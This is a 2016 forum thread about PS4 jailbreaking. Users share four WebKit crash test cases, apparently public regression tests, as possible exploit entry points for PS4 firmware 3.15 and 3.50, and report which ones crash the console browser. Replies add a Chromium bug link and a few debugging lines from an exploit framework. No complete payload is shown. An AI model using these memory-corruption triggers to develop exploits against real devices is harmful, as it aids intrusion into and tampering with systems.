PS4 Jailbreaking | Thread starter: mcmrc1 | Start date: Apr 10, 2016 at 12:04 PM
Status: Not open for further replies.
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code:
<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code:
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also the source code from the WebKit from Sony ;)
3. Entry Point:
Code:
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
<object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code:
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
Attached image: PS4 3.15 Firmware Entry Point.png
Comments

There were 5 code samples to test, and only one gave good results on PS4 (2.55 & 3.15 FW) and Vita:
Code:
<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="UTF-8">
   <title>ps4 test 1</title>
</head>
<body>
<h1>ps4 test #1 (Garbage) page loaded</h1>
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
<object onbeforeload="eventhandler2()"><iframe>
</body>
</html>

It gives the error message "Memory Full".
For those who want to dig into this bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=265889
I get the same results on numbers 2 and 4. Strange. On 3.15 here. Hey, does it seem to work better all in all on 3.50, guys? @Developer

EDIT: @GritNGrind any luck getting more than a system crash? something tangible for exploitation maybe?

Yeah, no luck getting it to work on 3.50. I tried different things all night. :( I got it to at least crash the browser and come up with an error code by running some code to fill up the memory and then exiting out of the browser, but going right back in to run the code again. It takes about 6 or 7 times doing this and the PS4 starts to get really slow, and then the browser finally crashes out, the screen goes black, and finally it resets to the main XMB and gives an error code.

I worked on CTurt's PS4 Playground trying to get that to work as well, modifying it with no luck. I know the lines it stumbles on, but not sure how to fix it (someone smarter than me) :) It seems to be when it writes to the logAdd that it stops executing after that. If I REM out those three lines the code will continue to run after that, but again stops the next time it does a logAdd. Again, if you REM out each logAdd the code goes all the way through, but of course at that point you don't get good results.
Code:
logAdd("0x" + executableHandle.toString(16)); // 0x52
logAdd("0x" + writableHandle.toString(16)); // 0x53
logAdd("Data address: 0x" + dataAddress.toString(16)); // 0x926300000